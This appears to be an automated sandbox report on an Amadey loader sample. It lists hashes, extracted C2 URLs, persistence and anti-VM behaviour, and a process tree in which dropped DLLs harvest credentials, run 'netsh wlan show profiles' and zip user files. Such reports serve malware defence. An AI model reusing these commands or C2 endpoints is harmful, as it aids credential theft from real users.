Analysis
- max time kernel: 150s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
- submitted: 27/04/2024, 17:07 UTC
- Static task: static1
- Behavioral task: behavioral1
- Sample: acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
- Resource: win10v2004-20240426-en
General
- Target: acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
- Size: 1.8MB
- MD5: 3129fec389a088955fae72aa12b20ef0
- SHA1: e4cc27027754574a6abdf0010333930016b37fb5
- SHA256: acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75
- SHA512: 918ac19261d99d7ea7cc92bdf6e72a8caff90eb6241c650fe95cf0230bce9af8bc52231c0a7452244b88b6024b0061351520e57400952e4bf4191e67bc8139e9
- SSDEEP: 49152:r3/bnfCUYZWGdSbS36Q5DTFpcL4Mne/qMFZQK:rjnf2vFpcL1uFZ
Malware Config
Extracted
amadey 4.20
http://193.233.132.139
- install_dir: 5454e6f062
- install_file: explorta.exe
- strings_key: c7a869c5ba1d72480093ec207994e2bf
- url_paths: /sev56rkm/index.php
Extracted
amadey 4.17
http://193.233.132.167
- install_dir: 4d0ab15804
- install_file: chrosha.exe
- strings_key: 1a9519d7b465e1f4880fa09a6162d768
- url_paths: /enigma/index.php
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | chrosha.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorta.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorta.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | amert.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 13ee951efa.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorta.exe
-
Blocklisted process makes network request 2 IoCs
flow | pid | Process
78 | 4968 | rundll32.exe
79 | 1044 | rundll32.exe
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | amert.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | amert.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 13ee951efa.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | chrosha.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 13ee951efa.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorta.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | chrosha.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorta.exe
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | explorta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | ee00809619.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | chrosha.exe
-
Executes dropped EXE 7 IoCs
pid | Process
4688 | explorta.exe
4812 | amert.exe
2428 | ee00809619.exe
2272 | 13ee951efa.exe
2484 | explorta.exe
3068 | chrosha.exe
3428 | explorta.exe
-
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | chrosha.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | explorta.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | explorta.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | amert.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | 13ee951efa.exe
Key opened | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine | explorta.exe
-
Loads dropped DLL 3 IoCs
pid | Process
1712 | rundll32.exe
4968 | rundll32.exe
1044 | rundll32.exe
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ee00809619.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\ee00809619.exe" | explorta.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\13ee951efa.exe = "C:\\Users\\Admin\\1000017002\\13ee951efa.exe" | explorta.exe
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x000700000002344b-57.dat | autoit_exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid | Process
3136 | acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
4688 | explorta.exe
4812 | amert.exe
2272 | 13ee951efa.exe
3068 | chrosha.exe
2484 | explorta.exe
3428 | explorta.exe
-
Drops file in Windows directory 2 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\explorta.job | acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
File created | C:\Windows\Tasks\chrosha.job | amert.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
-
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133587112625490842" | chrome.exe
-
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{E8B429F8-817C-4CC6-BB30-92DF7923D28C} | chrome.exe
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid | Process
2364 | chrome.exe
2364 | chrome.exe
2364 | chrome.exe
2364 | chrome.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 63 IoCs
-
Suspicious use of SendNotifyMessage 60 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
[level 1] C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe"
PID: 3136
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory

  [level 2] C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  PID: 4688
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

    [level 3] C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    PID: 2332

    [level 3] C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"
    PID: 4812
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses

    [level 3] C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe"
    PID: 2428
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
      [level 4] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      PID: 2364
      - Enumerates system info in registry
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaef08ab58,0x7ffaef08ab68,0x7ffaef08ab78
        PID: 2500

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:2
        PID: 2740

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 952

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 3500

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
        PID: 4916

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
        PID: 1680

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
        PID: 4924

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3264 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
        PID: 4664

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3328 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 2708

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 1584
        - Modifies registry class

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 4244

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 1840

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 3276

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 2176

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 528

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
        PID: 3048

        [level 5] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:2
        PID: 3248
        - Suspicious behavior: EnumeratesProcesses
    [level 3] C:\Users\Admin\1000017002\13ee951efa.exe
    Command line: "C:\Users\Admin\1000017002\13ee951efa.exe"
    PID: 2272
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses

[level 1] C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
Command line: "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
PID: 3568

[level 1] C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
Command line: C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
PID: 3068
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses

  [level 2] C:\Windows\SysWOW64\rundll32.exe
  Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
  PID: 1712
  - Loads dropped DLL

    [level 3] C:\Windows\system32\rundll32.exe
    Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
    PID: 4968
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses

      [level 4] C:\Windows\system32\netsh.exe
      Command line: netsh wlan show profiles
      PID: 2484

      [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal
      PID: 3520
      - Suspicious behavior: EnumeratesProcesses

  [level 2] C:\Windows\SysWOW64\rundll32.exe
  Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
  PID: 1044
  - Blocklisted process makes network request
  - Loads dropped DLL

[level 1] C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
Command line: C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID: 2484
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses

[level 1] C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
Command line: C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID: 3428
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
-
Remote address: 8.8.8.8:53
Request: g.bing.com IN A
Response:
g.bing.com IN CNAME g-bing-com.dual-a-0034.a-msedge.net
g-bing-com.dual-a-0034.a-msedge.net IN CNAME dual-a-0034.a-msedge.net
dual-a-0034.a-msedge.net IN A 204.79.197.237
dual-a-0034.a-msedge.net IN A 13.107.21.237
-
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E
Remote address: 204.79.197.237:443
Request:
GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
Response: HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; domain=.bing.com; expires=Thu, 22-May-2025 17:07:29 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 693888A47EF44E92B03D25D90D7D9BF1 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:29Z
date: Sat, 27 Apr 2024 17:07:29 GMT
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0ERemote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=5kAXrMywdhLn16yyUT0Rj-ACdIrO-_FBZkgY3G-ae6E; domain=.bing.com; expires=Thu, 22-May-2025 17:07:30 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9D807B57F5A04C778A641BE2280068F6 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:30Z
date: Sat, 27 Apr 2024 17:07:30 GMT
-
GEThttps://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893Remote address:23.62.61.194:443RequestGET /aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
